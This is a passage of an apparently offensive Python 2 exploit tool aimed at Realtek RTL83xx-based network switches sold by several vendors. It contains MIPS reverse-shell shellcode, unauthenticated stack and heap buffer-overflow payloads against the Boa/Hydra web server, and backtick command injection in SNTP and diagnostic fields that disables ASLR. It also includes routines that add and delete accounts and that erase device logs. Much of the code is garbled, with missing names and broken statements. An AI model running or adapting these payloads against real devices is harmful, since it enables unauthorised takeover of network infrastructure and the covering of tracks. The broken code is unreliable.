    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
    						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':False,	# My LAB workaround
    						#'stack':False, # False = use Heap, and there are no ASLR
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    		if self.ETag == 'report':
    			sorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value
    			for targets in sorted_dict: = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])
    				self.source = Vendor_ETag[targets]
    				print ""
    				tmp = "] {} {} v{} [".format(['vendor'],['model'],['version'])
    				print "[{:=^78}]".format(tmp)
    				print "" # make it nicer to read
    				LEN = len(['exploit'])
    				for exploits in['exploit']:
    					if not['exploit'][exploits]['vulnerable']:
    						LEN = LEN - 1
    				tmp = "] {}({}) [".format("Exploits ",LEN)
    				print "[{:-^78}]".format(tmp)
    				for exploits in['exploit']:
    					tmp =['exploit'][exploits]
    						log.success("{:.<54}[Authenticated: {}]\n{}\n".format(exploits, tmp['authenticated'] ,tmp['description']))
    				print "" # make it nicer to read
    				tmp = "] {}({}) [".format("Verification ",len(['verify']))
    				print "[{:-^78}]".format(tmp)
    				for verification in['verify']:
    					tmp =['verify'][verification]
    					log.success("{:.<54}[Authenticated: {}]\n{}\n".format(verification, tmp['authenticated'] ,tmp['description']))
    				print ""
    			return False
    		elif self.ETag == 'help':
    			sorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value
    			for targets in sorted_dict: = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])
    				self.source = Vendor_ETag[targets]
    				self.dict_merge(,self.source)"ETag: {:<11} [{} {} v{}]".format(targets,['vendor'],['model'],['version']))
    			print ""
    			return False
    		for check in Vendor_ETag.keys():
    			if check == self.ETag: = copy.deepcopy(Vendor_Template[Vendor_ETag[check]['template']])
    				self.source = Vendor_ETag[check]
    		return False
    class RTK_RTL83xx:
    	def __init__(self, rhost, proto, verbose, creds, Raw, lhost, lport):
    		self.rhost = rhost
    		self.proto = proto
    		self.verbose = verbose
    		self.credentials = creds
    		self.Raw = Raw
    		self.lhost = lhost
    		self.lport = lport
    		self.event = threading.Event()
    		self.headers = {
    	# Workaround for Planet Tech. and others as it will always be logged in at my LAB
    	def Workaround_logout(self):
    			URI = '/cgi-bin/dispatcher.cgi?cmd=3'
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) 
    			return True
    		except Exception as e:
    			return True
    	# Very rare I have seen garbage returned with JSON data
    	# make sure to clean out potential garbage, so we can load JSON with json.loads()
    	def clean_json(self, text):
    		self.text = text
    		start = 0
    		result = ''
    		for check in range(0,len(self.text)):
    			if self.text[check] == '{':
    				result += self.text[check]
    				start = start + 1
    			elif start:
    				result += self.text[check]
    				if self.text[check] == '}':
    					start = start - 1
    		return result
    	# Small function to return N in random chars
    	def random_string(self,length):
    		self.length = length
    		return 'A' * self.length
    		#return ''.join(random.choice(string.lowercase) for i in range(self.length))
    	def md5hash(self, string, base64encode):
    		self.string = string
    		self.base64encode = base64encode
    		hash_object = hashlib.md5(self.string)
    		md5_hash = hash_object.hexdigest()
    		if self.base64encode:
    			return base64.b64encode(md5_hash)	# Why...
    			return md5_hash
    	def caesar_encode(self, string):
    		self.string = string
    		return ''.join(chr(32 + int(ord(self.string[char])) % 95) for char in range(0,len(self.string)))
    	def caesar_decode(self, string):
    		self.string = string
    		return ''.join(chr(int(ord(self.string[char])) - 32 % 95) for char in range(0,len(self.string)))
    	# Obfuscation
    	# Functionality:
    	# Reversed password string, split each character 7 bytes apart, split and put size of password at two fixed locations in the string,
    	# then fill the rest with random garbage to look like advanced and unknown encryption
    	# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP
    	# Zyxel: GS1900-24-2.40_AAHL.1_20180705
    	def obfuscation_encode(self, password):
    		self.password = password
    		text = ''
    		possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    		# Max 99 char in password
    		self.password = self.password[:99]
    		inlen = len(self.password)
    		inlenn = len(self.password)
    		if (len((self.password) * 7) + 7) <= 320:
    			PASS_LEN = 321 # string needs to be 320 bytes as minimum
    			PASS_LEN = (len((self.password) * 7) + 7)
    		for i in xrange(1, PASS_LEN ,1):
    			if (0 == i % 7 and inlen > 0):
    				text += self.password[inlen-1]
    				inlen = inlen - 1
    			elif (i == 123):
    				if inlenn < 10:
    					text += '0'
    					text += str(int(math.floor(inlenn / 10)))
    			elif (i == 289):
    				text += str(inlenn % 10)
    				#text += '_'	# debug
    				text += possible[int(math.floor(randint(0, len(possible)-1)))] # random garbage
    		return text
    	# Obfuscation
    	# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP
    	# Zyxel: GS1900-24-2.40_AAHL.1_20180705
    	def obfuscation_decode(self, password):
    		self.password = password
    		text = ''
    		for i in range(1, len(self.password) ):
    			if (0 == i % 7):
    				if len(text) == (int(self.password[122]) * 10) + int(self.password[288]):
    				text += self.password[i-1]
    		text = text[::-1] # reverse string
    		return text
    	def netgear_hash(self, URI):
    		self.URI = URI
    		return '&hash=' + self.md5hash(URI.split("?")[1],False)
    	def _encrypt_RSA(self, modulus, passphrase, text):
    		key = RSA.construct((modulus, passphrase))
    		cipher =
    		ciphertext = cipher.encrypt(text)
    		return ciphertext
    	def RSA_encrypt_params(self, cisco_modulus, password):
    		self.cisco_modulus = cisco_modulus
    		self.password = password
    		encrypted_passphrase = self._encrypt_RSA(string.atol(self.cisco_modulus, 16),
    												 string.atol("10001", 16),
    		return base64.b64encode(encrypted_passphrase)
    	def RSA_Password(self, string):
    		self.string = string
    		URI = target['modulus_uri']
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)
    		result = json.loads(
    		if result['data']['modulus']:
    			cipher = self.RSA_encrypt_params(result['data']['modulus'], str(self.string))
    			return self.string
    		return urllib.quote_plus(cipher)
    	def check_XSID(self, target): = target
    			return True
    			return False
    	def Cisco_XSID(self,target): = target
    		URI = target['xsid_uri']
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)
    		result = json.loads(
    		if result['data']['modulus']:
    			cipher = self.RSA_encrypt_params(result['data']['modulus'],str(result['data']['xsid']))
    			return cipher
    			return result['data']['xsid']
    	def shellcode(self):
    		# Reverse shell
    		# SRC:
    		MIPSeb = string.join([
    			"\x24\x0f\xff\xfa"	# li	$t7, -6
    			"\x01\xe0\x78\x27"	# nor $t7, $zero
    			"\x21\xe4\xff\xfd"	# addi $a0, $t7, -3
    			"\x21\xe5\xff\xfd"	# addi $a1, $t7, -3
    			"\x28\x06\xff\xff"	# slti $a2, $zero, -1
    			"\x24\x02\x10\x57"	# li	$v0, 4183 ( sys_socket )
    			"\x01\x01\x01\x0c"	# syscall 0x40404
    			"\xaf\xa2\xff\xff"	# sw	$v0, -1($sp)
    			"\x8f\xa4\xff\xff"	# lw	$a0, -1($sp)
    			"\x34\x0f\xff\xfd"	# li	$t7, -3 ( sa_family = AF_INET )
    			"\x01\xe0\x78\x27"	# nor $t7, $zero
    			"\xaf\xaf\xff\xe0"	# sw	$t7, -0x20($sp)
    			# ================ You can change port here=================
    			"\x3c\x0ePP0PP1"	# lui $t6, 0x115c ( sin_port = 0x115c ) # 4444
    			# ============================================================
    			"\x35\xce\x7a\x69"	# ori $t6, $t6, 0x7a69 
    			"\xaf\xae\xff\xe4"	# sw	$t6, -0x1c($sp)
    			# ================ You can change ip here=================
    			"\x3c\x0eIP1IP2"	# lui $t6, 0xc0a8	 ( sin_addr = 0xc0a8 ... # 192 168
    			"\x35\xceIP3IP4"	# ori $t6, $t6, 0x029d ... 0x3901 # 57 1
    			# ============================================================
    			"\xaf\xae\xff\xe6"	# sw	$t6, -0x1a($sp)
    			"\x27\xa5\xff\xe2"	# addiu $a1, $sp, -0x1e
    			"\x24\x0c\xff\xef"	# li	$t4, -17( addrlen = 16 )
    			"\x01\x80\x30\x27"	# nor $a2, $t4, $zero
    			"\x24\x02\x10\x4a"	# li	$v0, 4170 ( sys_connect )
    			"\x01\x01\x01\x0c"	# syscall 0x40404
    			"\x24\x0f\xff\xfd"	# li	t7,-3
    			"\x01\xe0\x28\x27"	# nor a1,t7,zero
    			"\x8f\xa4\xff\xff"	# lw	$a0, -1($sp) 
    			# dup2_loop:
    			"\x24\x02\x0f\xdf"	# li	$v0, 4063 ( sys_dup2 )
    			"\x01\x01\x01\x0c"	# syscall 0x40404
    			"\x24\xa5\xff\xff"	# addi a1,a1,-1 (\x20\xa5\xff\xff)
    			"\x24\x01\xff\xff"	# li	at,-1
    			"\x14\xa1\xff\xfb"	# bne a1,at, dup2_loop
    			"\x28\x06\xff\xff"	# slti $a2, $zero, -1
    			"\x3c\x0f\x2f\x2f"	# lui $t7, 0x2f2f (//)
    			"\x35\xef\x62\x69"	# ori $t7, $t7, 0x6269 (bi)
    			"\xaf\xaf\xff\xec"	# sw	$t7, -0x14($sp)
    			"\x3c\x0e\x6e\x2f"	# lui $t6, 0x6e2f (n/)
    			"\x35\xce\x73\x68"	# ori $t6, $t6, 0x7368 (sh) 
    			"\xaf\xae\xff\xf0"	# sw	$t6, -0x10($sp)
    			"\xaf\xa0\xff\xf4"	# sw	$zero, -0xc($sp)
    			"\x27\xa4\xff\xec"	# addiu $a0, $sp, -0x14
    			"\xaf\xa4\xff\xf8"	# sw	$a0, -8($sp)
    			"\xaf\xa0\xff\xfc"	# sw	$zero, -4($sp)
    			"\x27\xa5\xff\xf8"	# addiu $a1, $sp, -8
    			"\x24\x02\x0f\xab"	# li	$v0, 4011 (sys_execve)
    			"\x01\x01\x01\x0c"	# syscall 0x40404
    			"\x8f\x84\x80\x18"	# Variant of NOP
    			], '')	
    		# Connect back IP
    		ip_hex = '{:02x} {:02x} {:02x} {:02x}'.format(*map(int, self.lhost.split('.')))
    		ip_hex = ip_hex.split()
    		# Let's break apart the hex code of LPORT into two bytes
    		port_hex = hex(int(self.lport))[2:]
    		port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
    		port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
    		port_hex = port_hex.split()
    		if len(port_hex) == 1:
    			port_hex = ('00' + ' ' + ''.join(port_hex)).split()
    		# Replace IP and PORT in shellcode
    		MIPSeb = MIPSeb.replace('PP0',chr(int(port_hex[0],16)))
    		MIPSeb = MIPSeb.replace('PP1',chr(int(port_hex[1],16)))
    		MIPSeb = MIPSeb.replace('IP1',chr(int(IP1,16)))
    		MIPSeb = MIPSeb.replace('IP2',chr(int(IP2,16)))
    		MIPSeb = MIPSeb.replace('IP3',chr(int(IP3,16)))
    		MIPSeb = MIPSeb.replace('IP4',chr(int(IP4,16)))
    		return MIPSeb
    	# Access: Unauthorized
    	# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected
    	# Note:
    	# The vulnerability are _not_ from Boa nor Hydra, coming from Realtek coding.
    	# The device should be newly restarted and/or not been accessed with http/https, so the heap is relative untouched.
    	# This code will:
    	# 1. Trigger stack overflow in boa/Hydra web server [ extractVmlinuxImage(), getFdStr() ]
    	# 2. Overwrite first byte in provided RA with 0x00, so we can jump within the binary
    	# 3. Jump to our gadget
    	# 4. Jump to NOP sled and shellcode on heap
    	# 5. Launch forked() reverse shell
    	# 6. Try restart Boa/Hydra (to mitigate DoS)
    	# Success: Reverse shell and restarted Boa/Hydra
    	# Failure: No reverse shell and crashed Boa/Hydra (DoS)
    	def heack_hydra_shell(self, target): = target
    		if not['exploit']['heack_hydra_shell']['vulnerable']:
    			log.failure("Not listed as vulnerable")
    			return False
    		# Connect-timeout in seconds
    		timeout = 20
    		lsock = listen(port=self.lport)
    		c = lsock.wait_for_connection()
    		if not self.event.is_set():
    			c.interactive(prompt = '# ')
    			return True
    			log.failure("Got internal connection to quit")
    			return False
    	# Access: Unauthorized
    	def heack_hydra_exploit(self, threadName, target):
    		self.threadName = threadName = target
    		CRLF_NOP = 0x24060d0a # NOP w/ CRLF (li $a2, 0x00000D0A)
    		NOP =0x2406ffff	# NOP (li $a2, 0xFFFFFFFF)
    		JUMP = 0x04110111 # bal +273
    		# Debug
    		#CRLF_NOP = 0x4c460d0a # LF\r\n
    		#NOP = 0x6e6f6f70 # noop
    		#JUMP = 0x4a4d5044 # JMPD
    		#MIPSeb = ("\x43\x4f\x44\x45" * 45) + "\x4e\x4f\x4f\x50" # CODE + NOOP = 148 bytes
    		query_args = ''
    		# This will overwrite RA:
    		# NETGEAR: 'getFdStr()' modified, this is weird 'solution' to have $t9 loaded with JMP in 'fwrite()'
    		if'hash_uri'): # NETGEAR Inc. (GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)
    			query_args += struct.pack('>L',(['exploit']['heack_hydra_shell']['gadget'])) * 76 # direct heap address
    			query_args += (struct.pack('>L',NOP) * 73) + struct.pack('>L',JUMP) + struct.pack('>L',NOP) # 300 bytes + RA below
    		# Return address to where we want jump (0x58 will be overwritten with 0x00 below)
    		query_args += struct.pack('>L',(['exploit']['heack_hydra_shell']['gadget'] + 0x58000000)) # 0x58xxxxxx
    		# Space between new RA and overwrite with 0x00 (Range: 1 => 3)
    		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * 2
    		# CRLF_NOP will overwrite '0x58' in above RA address with 0x00, as the code will always terminate CRLF with 0x00
    		# 7FF4BE606E 6F 6F 70 6E 6F 6F 706E 6F 6F 70 6E 6F 6F 70noopnoopnoopnoop
    		# 7FF4BE706E 6F 6F 70 6E 6F 6F 706E 6F 6F 70 6E 6F 6F 70noopnoopnoopnoop
    		# 7FF4BE806E 6F 6F 70 6E 6F 6F 704C 46 0D 0A 00 40 FF ACnoopnoopLF...@.. <=== 'X' overwritten with 0x00
    		query_args += (struct.pack('>L',NOP) * 74) + struct.pack('>L',CRLF_NOP) # 300 bytes + 0x00
    		# $v0 = tmpHeaderSize
    		# $gp = pointing to heap
    		# Gadget:
    		# addu $v0,	$g0 # The addition of $v0 and $g0 points to our heap NOP sled
    		# jr	$v0 	# Its lovely when [heap] are rwxp :>
    		# This adjusting $v0 value (Range: 4 => 9)
    		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) *['exploit']['heack_hydra_shell']['v0']
    		# fork() reverse shell to get new PID, and jump over child
    		query_args += struct.pack('>L',0x24020fa2) # li $v0, 4002 ( fork )
    		query_args += struct.pack('>L',0x0101010c) # syscall unk_40404
    		query_args += struct.pack('>L',0x1c400101) # bgtz$v0, +257 ( Jump over child to restart boa/Hydra )
    		# Child
    		query_args += ((struct.pack('>L',NOP) * 60) + struct.pack('>L',CRLF_NOP))
    		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))
    		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))
    		# Shellcode
    		query_args += self.shellcode()
    		query_args += ((struct.pack('>L',NOP) * 17) + struct.pack('>L',CRLF_NOP))
    		# Parent
    		query_args += (struct.pack('>L',NOP) * 59)
    		# Restart Boa/Hydra to mitigate DoS
    		# (From boa/Hydra binary == binary dependent)
    		query_args += struct.pack('>L',0x8f848018) # opcode [la $a0, 0x430000]
    		query_args += struct.pack('>L',['exploit']['heack_hydra_shell']['system']) # opcode, binary dependent [la $t9, system]
    		query_args += struct.pack('>L',0x0320f809) # opcode [jalr $t9 ; system]
    		query_args += struct.pack('>L',['exploit']['heack_hydra_shell']['handler']) # opcode, binary dependent [addiu $a0, (.ascii "handler -c boa &" - 0x430000)]
    		query_args += struct.pack('>L',CRLF_NOP)
    		# Parent Boa/Hydra will get SIGSEGV here, but we do not care as its restarted
    		URI =['exploit']['heack_hydra_shell']['uri'] + (struct.pack('>L',NOP) * 247) + struct.pack('>L',JUMP) + struct.pack('>L',NOP)
    		if'hash_uri'): # NETGEAR Inc. (GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)
    			URI =['exploit']['heack_hydra_shell']['uri']
    			URI += '&&' # align
    			URI += self.netgear_hash(URI)
    		# Everything here is designed to have opcodes properly aligned in memory
    		MESSAGE = 'POST '+ URI + ' HTTP/1.1\r\n'	# Important with 3x 0x20 between POST and URI to align opcodes at heap
    		MESSAGE += 'Content-Length: 3133337\r\n'	# Trick Boa/Hydra to think we will send more than 1MiB
    		MESSAGE += 'Host:PWN' + '\r\n\r\n'			# 'PWN' = Align opcodes in memory
    		MESSAGE += query_args
    		log.success("Payload: {} bytes, $v0: {}".format(len(query_args),hex(len(query_args)) ))
    		self.rport = int(self.rhost.split(":")[1])
    		self.rhost = self.rhost.split(":")[0]
    			r = remote(self.rhost,self.rport,ssl=False) # HTTP Working, about 0x105c in $v0
    			#r = remote(self.rhost,self.rport,ssl=True) # HTTPS Not working, need minimium 0x4350 in $v0
    		except Exception as e:
    			# Dirty but works
    			return False
    		except Exception as e:
    			# Dirty but works
    			return False
    	# Access: N/A
    	# Exploitable: N/A
    	# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected
    	def heack_shell(self, target): = target
    		if not['exploit']['heack_cgi_shell']['vulnerable']:
    			log.failure("Not listed as vulnerable")
    			return False
    		l = listen(port=lport)
    		c = l.wait_for_connection()
    		if not self.event.is_set():
    			self.event.set() # Success, got the connection, stop trying to exploit
    			c.interactive(prompt = '# ')
    			return True
    			log.failure("Got internal connection to quit")
    			return False
    	# Access: Unauthorized
    	# This will load shellcode on remote, used for both stack and heap.
    	# stack: walk down in stack and hit the NOP sled to execute shellcode
    	# heap: walk up on heap and hit the NOP sled to execute shellcode
    	def heack_exploit(self, threadName, target):
    		self.threadName = threadName = target
    		time.sleep(2) # So this will be consistent after output from 'reverse_shell'
    		shell = log.progress('shellcode')
    		self.Workaround =['exploit']['heack_cgi_shell']['workaround']
    		NOP = 0x2406ffff	# NOP (li $a2, 0xFFFFFFFF)
    		START =['exploit']['heack_cgi_shell']['START']
    			EXPR = (START >['exploit']['heack_cgi_shell']['STOP']) # down on stack
    			EXPR = (START <['exploit']['heack_cgi_shell']['STOP']) # up on heap
    		while EXPR:
    			if self.Workaround:
    			shell.status("{} searching".format(hex(START)))
    			query_args =['exploit']['heack_cgi_shell']['query']
    			query_args = query_args.replace("_ALIGN",self.random_string(['exploit']['heack_cgi_shell']['align']))
    			query_args = query_args.replace("_USRNOP",struct.pack('>L',NOP) *['exploit']['heack_cgi_shell']['usr_nop'])
    			query_args = query_args.replace("_SHELLCODE",self.shellcode())
    			query_args = query_args.replace("_PWDNOP",struct.pack('>L',NOP) *['exploit']['heack_cgi_shell']['pwd_nop']) # Filler only
    			if['login']['encryption'] == 'caesar':
    				query_args = query_args.replace("_RA_START",struct.pack('>L',START + 0xc1c1c1c1)) # caesar bug? =]
    				query_args = query_args.replace("_RA_START",struct.pack('>L',START))
    				URI =['exploit']['heack_cgi_shell']['login_uri']
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				#r = remote("",self.lport,ssl=False)
    			except Exception as e:
    				if e.code == 502:
    					r = remote("",self.lport,ssl=False)
    					return False
    			if self.event.is_set():
    				shell.success("{} <= found".format(hex(START))) # Its lovely when [stack] are rwxp :>
    				return True
    				START = START - 0x30 # Walk down from top of stack
    				START = START + 0xC00 # Walk up on heap (and bigger jumps)
    		shell.failure("Not found, play with start/stop addresses?")
    		# Little dirty but works
    		r = remote("",self.lport,ssl=False)
    		return False
    	# Access: Unauthorized
    	def stack_add_account(self, target): = target
    		account = log.progress("Stack ADD Account")
    		if not['exploit']['stack_cgi_add_account']['vulnerable']:
    			account.failure("Not listed as vulnerable")
    			return False
    		URI =['exploit']['stack_cgi_add_account']['uri']
 "Credentials: {}/{}".format(str(self.credentials.split(':')[0]),str(self.credentials.split(':')[1])))
    		self.Workaround =['exploit']['stack_cgi_add_account']['workaround']
    		if self.Workaround:
    			query_args =['exploit']['stack_cgi_add_account']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_add_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_add_account']['account'])
    			query_args = query_args.replace("USERNAME",str(self.credentials.split(':')[0]))
    			query_args = query_args.replace("PASSWORD",str(self.credentials.split(':')[1]))
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			return False
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    	# Access: Unauthorized
    	def stack_del_account(self, target): = target
    		account = log.progress("Stack DEL Account")
    		if not['exploit']['stack_cgi_del_account']['vulnerable']:
    			account.failure("Not listed as vulnerable")
    			return False
    		URI =['exploit']['stack_cgi_del_account']['uri']
    		self.Workaround =['exploit']['stack_cgi_del_account']['workaround']
    		if self.Workaround:
    			query_args =['exploit']['stack_cgi_del_account']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_del_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_del_account']['account'])
    			query_args = query_args.replace("USERNAME",self.credentials.split(':')[0])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			return False
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    	# Access: Unauthorized
    	def stack_cgi_diag(self, target): = target
    		ping = log.progress("Stack DIAG")
    		if not['exploit']['heack_cgi_shell']['stack']:
    			ping.success("heap selected (ASLR == False)")
    			return True
    		if not['exploit']['stack_cgi_diag']['vulnerable']:
    			ping.failure("Not listed as vulnerable")
    			return False
    		ASLR_ENABLED = True # Always assume that ASLR is enabled, until verified
    		URI =['exploit']['stack_cgi_diag']['uri']
    		self.Workaround =['exploit']['stack_cgi_diag']['workaround']
    		if self.Workaround:
    			# Inject(disable ASLR)
    			ping.status("Injecting to disable")
    			query_args =['exploit']['stack_cgi_diag']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_diag']['sys_ping_post_cmd'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				if self.Workaround:
    				ping.failure("Disable Injection: Failed!")
    				return False
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    				# Inject(check ASLR)
    				ping.status("Injecting to verify")
    				query_args =['exploit']['stack_cgi_diag']['content']
    				query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten
    				query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_diag']['sys_ping_post_check'])
    				DEBUG("SEND",(URI, query_args))
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				if self.Workaround:
    				ping.failure("Verify Injection: Failed!")
    			except Exception as e:
    				if e.code == 502:
    					ping.status("Verifying ASLR")
    					if self.Workaround:
    					return False
    			URI =['exploit']['stack_cgi_diag']['verify_uri']
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    			response =
    			if response[0] == '0':
    				ping.success("ASLR disabled")
    				return True
    				ping.failure("ASLR still enabled")
    				return False
    		except Exception as e:
    			if force:
    				ping.success("Forcing... ASLR might been disabled")
    				return True
    				log.failure("You can try with --force, some FW do not process correctly after ASLR been disabled")
    				log.failure("or you can give --auth_shell a try instead")
    				return False
    	# Access: Unauthorized
    	def stack_cgi_sntp(self, target): = target
    		SNTP = log.progress("Stack SNTP")
    		if not['exploit']['heack_cgi_shell']['stack']:
    			SNTP.success("heap selected (ASLR == False)")
    			return True
    		if not['exploit']['stack_cgi_sntp']['vulnerable']:
    			SNTP.failure("Not listed as vulnerable")
    			return False
    		ASLR_ENABLED = True
    		URI =['exploit']['stack_cgi_sntp']['uri']
    		self.Workaround =['exploit']['stack_cgi_sntp']['workaround']
    		if self.Workaround:
    			# Enable SNTP
    			SNTP.status("Enable SNTP")
    			query_args =['exploit']['stack_cgi_sntp']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_enable'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				SNTP.failure("Enable SNTP: Failed!")
    				return False
    			if self.Workaround:
    		except Exception as e:
    			if e.code == 502:
    				SNTP.status("SNTP Enabled")
    				if self.Workaround:
    				return False
    			# Inject SNTP (disable ASLR)
    			SNTP.status("Injecting to disable")
    			query_args =['exploit']['stack_cgi_sntp']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_sntp']['sys_timeSntp_set_cmd'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			if self.Workaround:
    			SNTP.failure("Disable Injection: Failed!")
    			return False
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    				# Inject SNTP (check ASLR)
    				SNTP.status("Injecting to verify")
    				query_args =['exploit']['stack_cgi_sntp']['content']
    				query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten
    				query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check'])
    				DEBUG("SEND",(URI, query_args))
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				if self.Workaround:
    				SNTP.failure("Verify Injection: Failed!")
    				return False
    			except Exception as e:
    				if e.code == 502:
    					return False
    		SNTP.status("Verifying ASLR")
    		if self.Workaround:
    			URI =['exploit']['stack_cgi_sntp']['verify_uri']
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    			response =
    			if response[0] == '0':
    				SNTP.success("ASLR disabled")
    				ASLR_ENABLED = False
    				SNTP.failure("ASLR Enabled")
    				return False
    		except Exception as e:
    			if force:
    				SNTP.success("Forcing... ASLR might been disabled")
    				return False
    			# Delete SNTP injection
    			URI =['exploit']['stack_cgi_sntp']['uri']
    			SNTP.status("Removing injection")
    			query_args =['exploit']['stack_cgi_sntp']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set_cmd'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			SNTP.failure("Removing injection: Failed!")
    			if self.Workaround:
    			return False
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    			# Disable SNTP
    			SNTP.status("Disable SNTP")
    			query_args =['exploit']['stack_cgi_sntp']['content']
    			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_disable'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				SNTP.failure("Disable SNTP: Failed!")
    				return False
    			if self.Workaround:
    		except Exception as e:
    			if e.code == 502:
    				SNTP.status("SNTP Disabled")
    				if self.Workaround:
    				return False
    		if not ASLR_ENABLED:
    			return True
    			SNTP.failure("ASLR Enabled: Failure")
    			return False
    	# Access: Unauthorized
    	def stack_cgi_log(self, target): = target
    		self.Workaround =['exploit']['stack_cgi_log']['workaround']
    		if self.Workaround:
    		URI =['exploit']['stack_cgi_log']['uri']
    		logging = log.progress("Stack LOG disable & clean")
    		if not['exploit']['stack_cgi_log']['vulnerable']:
    			logging.failure("No logging on this switch (?)")
    			return True
